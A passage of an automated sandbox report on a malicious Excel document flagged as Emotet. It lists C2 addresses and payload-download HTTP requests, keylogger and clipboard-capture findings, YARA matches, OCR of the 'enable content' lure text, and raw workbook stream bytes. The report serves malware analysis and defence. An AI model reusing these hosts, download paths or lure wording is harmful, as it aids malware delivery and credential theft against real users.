Source: rundll32.exe, 00000011.00000002.679244747.000000000069A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://160.16.102.168:80/gYIhzpA
Source: rundll32.exe, 00000011.00000002.679438448.00000000006D7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://160.16.102.168:80/gYIhzpB
Source: rundll32.exe, 00000011.00000002.679438448.00000000006D7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://160.16.102.168:80/gYIhzpH
Source: rundll32.exe, 00000011.00000002.679244747.000000000069A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://160.16.102.168:80/gYIhzpK
Source: rundll32.exe, 00000011.00000002.679438448.00000000006D7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://160.16.102.168:80/gYIhzpz
Source: C:\Windows\System32\mshta.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\fe[1].htm Jump to behavior
Source: unknown DNS traffic detected: queries for: ayoobeducationaltrust.in
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10012C30 _memset,connect,_strcat,send,recv, 9_2_10012C30
Source: global traffic HTTP traffic detected: GET /vvv/ppp/fe.html HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 91.240.118.168Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /vvv/ppp/fe.png HTTP/1.1Host: 91.240.118.168Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /cms/LmOOeDnNo0dh4vkN/ HTTP/1.1Host: ayoobeducationaltrust.inConnection: Keep-Alive
Source: unknown TCP traffic detected without corresponding DNS query: 91.240.118.168
Source: unknown TCP traffic detected without corresponding DNS query: 91.240.118.168
Source: unknown TCP traffic detected without corresponding DNS query: 91.240.118.168
Source: unknown TCP traffic detected without corresponding DNS query: 91.240.118.168
Source: unknown TCP traffic detected without corresponding DNS query: 91.240.118.168
Source: unknown TCP traffic detected without corresponding DNS query: 91.240.118.168
Source: unknown TCP traffic detected without corresponding DNS query: 91.240.118.168
Source: unknown TCP traffic detected without corresponding DNS query: 91.240.118.168
Source: unknown TCP traffic detected without corresponding DNS query: 91.240.118.168
Source: unknown TCP traffic detected without corresponding DNS query: 91.240.118.168
Source: unknown TCP traffic detected without corresponding DNS query: 91.240.118.168
Source: unknown TCP traffic detected without corresponding DNS query: 91.240.118.168
Source: unknown TCP traffic detected without corresponding DNS query: 91.240.118.168
Source: unknown TCP traffic detected without corresponding DNS query: 91.240.118.168
Source: unknown TCP traffic detected without corresponding DNS query: 91.240.118.168
Source: unknown TCP traffic detected without corresponding DNS query: 91.240.118.168
Source: unknown TCP traffic detected without corresponding DNS query: 91.240.118.168
Source: unknown TCP traffic detected without corresponding DNS query: 91.240.118.168
Source: unknown TCP traffic detected without corresponding DNS query: 91.240.118.168
Source: unknown TCP traffic detected without corresponding DNS query: 91.240.118.168
Source: mshta.exe, 00000004.00000003.424627198.000000000054C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.448920352.000000000054C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: /moc.nideknil.wwwwww.linkedin.com equals www.linkedin.com (Linkedin)
Source: mshta.exe, 00000004.00000003.424627198.000000000054C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.448920352.000000000054C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: www.linkedin.com equals www.linkedin.com (Linkedin)

Key, Mouse, Clipboard, Microphone and Screen Capturing
barindex
Potential key logger detected (key state polling based)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_1001B43F GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageA, 9_2_1001B43F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_1001B43F GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageA, 11_2_1001B43F
Creates a window with clipboard capturing capabilities
Source: C:\Windows\System32\mshta.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior

E-Banking Fraud
barindex
Yara detected Emotet
Source: Yara match File source: 12.2.rundll32.exe.2a0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.170000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.200000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.2e90000.16.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.2850000.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.380000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.1d0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.4b0000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.a30000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.b20000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.2520000.10.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.cc0000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.bd0000.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2e00000.10.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2820000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.270000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.3020000.13.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.1c0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.a30000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.a30000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.b80000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.2860000.10.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.2a0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2820000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2f40000.12.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.1e0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.270000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.470000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.2e40000.12.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.2c90000.13.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rundll32.exe.190000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.2f60000.13.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.24f0000.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.25e0000.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.310000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.440000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.3a0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2dd0000.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.24f0000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.380000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.30b0000.13.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.ac0000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.4b0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.2c60000.12.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.b20000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.bd0000.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.2d00000.14.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.1d0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.b10000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.5a0000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rundll32.exe.340000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.1e0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.b50000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.b50000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.26a0000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.cc0000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2e80000.11.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.2e60000.15.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.4e0000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.26d0000.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2e00000.10.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.a00000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.2860000.10.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.2c60000.12.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.2910000.10.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.2fe0000.12.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.2fe0000.12.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.8f0000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.840000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.210000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.2a0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.b50000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.840000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.170000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.2e70000.11.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rundll32.exe.190000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.b00000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.2590000.11.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.26a0000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.200000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.350000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.1e0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.ae0000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.2910000.10.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.bc0000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.3a0000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.2d0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.2ec0000.17.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.27e0000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.2d00000.14.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.2590000.11.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.210000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.310000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.27e0000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.2890000.11.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.b50000.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.1c0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.2e90000.16.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.10000000.18.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.470000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2f40000.12.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.a00000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.b10000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.10000000.14.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.10000000.14.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.10000000.14.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000F.00000002.616456228.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.512416856.0000000002F40000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.683540331.0000000010001000.00000020.00000001.01000000.0000000E.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.617069039.00000000008F1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.564980270.00000000030B1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.616617596.0000000000201000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.564788037.0000000002851000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.679113549.0000000000351000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.681597853.0000000002C91000.00000020.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.617285505.00000000024F0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.564756951.00000000027E0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.564304775.00000000002A0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.564841038.0000000002910000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.512269279.0000000002820000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.617389585.0000000002590000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.680671662.00000000026A0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.680752870.00000000026D1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.679483027.0000000000B50000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.617514155.0000000002E41000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.679062553.00000000001E0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.681792444.0000000002EC1000.00000020.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.620719407.0000000010001000.00000020.00000001.01000000.0000000E.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.681556359.0000000002C60000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.679555584.0000000000CC0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.511939105.0000000000441000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.681640222.0000000002D00000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.460122857.0000000000341000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.566974916.0000000000B01000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.681204228.0000000002860000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.620541885.00000000002A1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.616727376.00000000003A0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.617246098.0000000000BC1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.460211581.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.511964806.0000000000470000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.620492867.0000000000270000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.564618433.0000000000AC1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.564587056.0000000000A30000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.617654875.0000000010001000.00000020.00000001.01000000.0000000E.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.617205636.0000000000B50000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.566592140.0000000000210000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.565021247.0000000010001000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.512350669.0000000002E00000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.617317530.0000000002521000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.679178655.00000000005A1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.512137672.0000000000AE1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.564430858.00000000004E1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.680211767.00000000025E1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.511829011.00000000001E1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.511865871.0000000000310000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.511778687.0000000000170000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.564371056.00000000004B0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.564944730.0000000002FE0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.514931269.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.681736430.0000000002E90000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.679134510.0000000000380000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.567255358.0000000010001000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.617576888.0000000002F61000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.460063482.0000000000190000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.564702502.0000000000BD1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.512384350.0000000002E81000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.681713030.0000000002E61000.00000020.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.681364704.0000000002891000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.512450327.0000000003021000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.564887911.0000000002E71000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.679503750.0000000000B81000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.616926650.0000000000840000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.564646354.0000000000B20000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.512203615.0000000000BD1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.617169491.0000000000A31000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.512323278.0000000002DD1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.514649253.00000000001D0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.564333785.00000000002D1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.512502215.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.617141455.0000000000A00000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.514700543.0000000000201000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.512166505.0000000000B10000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: C:\ProgramData\QWER.dll, type: DROPPED

System Summary
barindex
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Source: Screenshot number: 4 Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document. 18 19 20 21 22 23 24
Source: Screenshot number: 4 Screenshot OCR: DOCUMENT IS PROTECTED. 13 14 15 Previewing is not available for protected documents. 16 17 Yo
Source: Screenshot number: 4 Screenshot OCR: protected documents. 16 17 You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to pre
Source: Screenshot number: 4 Screenshot OCR: ENABLE CONTENT" buttons to preview this document. 18 19 20 21 22 23 24 25 26 27 28 29 3
Source: Document image extraction number: 0 Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document.
Source: Document image extraction number: 0 Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available for protected documents. You have to press "ENA
Source: Document image extraction number: 0 Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
Source: Document image extraction number: 0 Screenshot OCR: ENABLE CONTENT" buttons to preview this document.
Source: Document image extraction number: 1 Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document.
Source: Document image extraction number: 1 Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available for protected documents. You have to press "ENA
Source: Document image extraction number: 1 Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
Source: Document image extraction number: 1 Screenshot OCR: ENABLE CONTENT" buttons to preview this document.
Source: Screenshot number: 8 Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document. 19 20 21 22 23 24 U LI
Source: Screenshot number: 8 Screenshot OCR: DOCUMENT IS PROTECTED. 13 14 15 , , Previewing is not available for protected documents. 16 ::
Source: Screenshot number: 8 Screenshot OCR: protected documents. 16 :: You have to press :ENABLE EDITING" and "ENABLE CONTENT" buttons to pre
Source: Screenshot number: 8 Screenshot OCR: ENABLE CONTENT" buttons to preview this document. 19 20 21 22 23 24 U LI 25 26 27 28 29
Document contains OLE streams with names of living off the land binaries
Source: 364453688149503140239183.xls Stream path 'Workbook' : ........ZO..........................\.p....xXx B.....a.........=...........................................=........p.08.......X.@...........".......................1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.*.h...6...........C.a.l.i.b.r.i. .L.i.g.h.t.1...,...6...........C.a.l.i.b.r.i.1.......6...........C.a.l.i.b.r.i.1.......6...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.......<...........C.a.l.i.b.r.i.1.......>...........C.a.l.i.b.r.i.1.......?...........C.a.l.i.b.r.i.1.......4...........C.a.l.i.b.r.i.1.......4...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................A.r.i.a.l...3......#.,.#.#.0.\. .".. ".;.\.-.#.,.#.#.0.\. .".. "...=......#.,.#.#.0.\. .".. ".;.[.R.e.d.].\.-.#.,.#.#.0.\. .".. "...?......#.,.#.#.0...0.0.\. .".. ".;.\.-.#.,.#.#.0...0.0.\. .".. "...I..."..#.,.#.#.0...0.0.\. .".. ".;.[.R.e.d.].\.-.#.,.#.#.0...0.0.\. .".. "...q.*.6.._.-.*. .#.,.#.#.0.\. .".. "._.-.;.\.-.*. .#.,.#.#.0.\. .".. "._.-.;._.-.*. .".-.".\. .".. "._.-.;._.-.@._.-...,.).'.._-* #,##0_-;\-* #,##0_-;_-* "-"_-;_-@_-....,.>.._.-.*. .#.,.#.#.0...0.0.\. .".. "._.-.;.\.-.*. .#.,.#.#.0...0.0.\. .".. "._.-.;._.-.*. .".-.".?.?.\. .".. "._.-.;._.-.@._.-...4.+./.._-* #,##0.00_-;\-* #,##0.00_-;_-* "-"??_-;_-@_-..?...:.._("$"* #,##0.00_);_("$"* \(#,##0.00\);_("$"* "-"??_);_(@_).......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ...ff....... ......+... ............ ......)... ............ ......,... ............ ......*... ............ .......... ............ .......... ............ .......... ............ .......... ....P....... .......... ....P....... .......
Source: 364453688149503140239183.xls.0.dr Stream path 'Workbook' : ........ZO..........................\.p....user B.....a.........=...........................................=........p.08.......X.@...........".......................1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.*.h...6...........C.a.l.i.b.r.i. .L.i.g.h.t.1...,...6...........C.a.l.i.b.r.i.1.......6...........C.a.l.i.b.r.i.1.......6...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.......<...........C.a.l.i.b.r.i.1.......>...........C.a.l.i.b.r.i.1.......?...........C.a.l.i.b.r.i.1.......4...........C.a.l.i.b.r.i.1.......4...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................A.r.i.a.l...3......#.,.#.#.0.\. .".. ".;.\.-.#.,.#.#.0.\. .".. "...=......#.,.#.#.0.\. .".. ".;.[.R.e.d.].\.-.#.,.#.#.0.\. .".. "...?......#.,.#.#.0...0.0.\. .".. ".;.\.-.#.,.#.#.0...0.0.\. .".. 